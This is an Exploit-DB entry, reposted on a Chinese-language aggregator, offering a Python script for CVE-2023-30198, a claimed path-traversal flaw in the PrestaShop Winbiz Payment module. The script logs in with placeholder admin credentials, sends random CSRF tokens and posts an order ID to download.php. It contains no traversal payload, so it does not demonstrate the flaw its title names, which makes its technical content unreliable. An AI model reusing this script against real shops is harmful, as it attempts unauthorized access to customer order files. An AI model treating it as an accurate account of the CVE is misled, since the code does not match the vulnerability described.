PrestaShop Winbiz Payment module – Improper Limitation of a Pathname to a Restricted Directory

• Exploit Database
• 137 阅读

• 作者： Amirhossein Bahramizadeh
  日期： 2023-06-26
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51545/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62

  # Exploit Title: PrestaShop Winbiz Payment module - Improper Limitation of a Pathname to a Restricted Directory # Date: 2023-06-20 # Dork: /modules/winbizpayment/downloads/download.php # country: Iran # Exploit Author: Amirhossein Bahramizadeh # Category : webapps # Vendor Homepage: https://shop.webbax.ch/modules-pour-winbiz/153-module-prestashop-winbiz-payment-reverse.html # Version: 17.1.3 (REQUIRED) # Tested on: Windows/Linux # CVE : CVE-2023-30198   import requests import string import random   # The base URL of the vulnerable site base_url = "http://example.com"   # The URL of the login page login_url = base_url + "/authentication.php"   # The username and password for the admin account username = "admin" password = "password123"   # The URL of the vulnerable download.php file download_url = base_url + "/modules/winbizpayment/downloads/download.php"   # The ID of the order to download order_id = 1234   # The path to save the downloaded file file_path = "/tmp/order_%d.pdf" % order_id   # The session cookies to use for the requests session_cookies = None   # Generate a random string for the CSRF token csrf_token = ''.join(random.choices(string.ascii_uppercase + string.digits, k=32))   # Send a POST request to the login page to authenticate as the admin user login_data = {"email": username, "passwd": password, "csrf_token": csrf_token} session = requests.Session() response = session.post(login_url, data=login_data)   # Save the session cookies for future requests session_cookies = session.cookies.get_dict()   # Generate a random string for the CSRF token csrf_token = ''.join(random.choices(string.ascii_uppercase + string.digits, k=32))   # Send a POST request to the download.php file to download the order PDF download_data = {"id_order": order_id, "csrf_token": csrf_token} response = session.post(download_url, cookies=session_cookies, data=download_data)   # Save the downloaded file to disk with open(file_path, "wb") as f: f.write(response.content)   # Print a message indicating that the file has been downloaded print("File downloaded to %s" % file_path)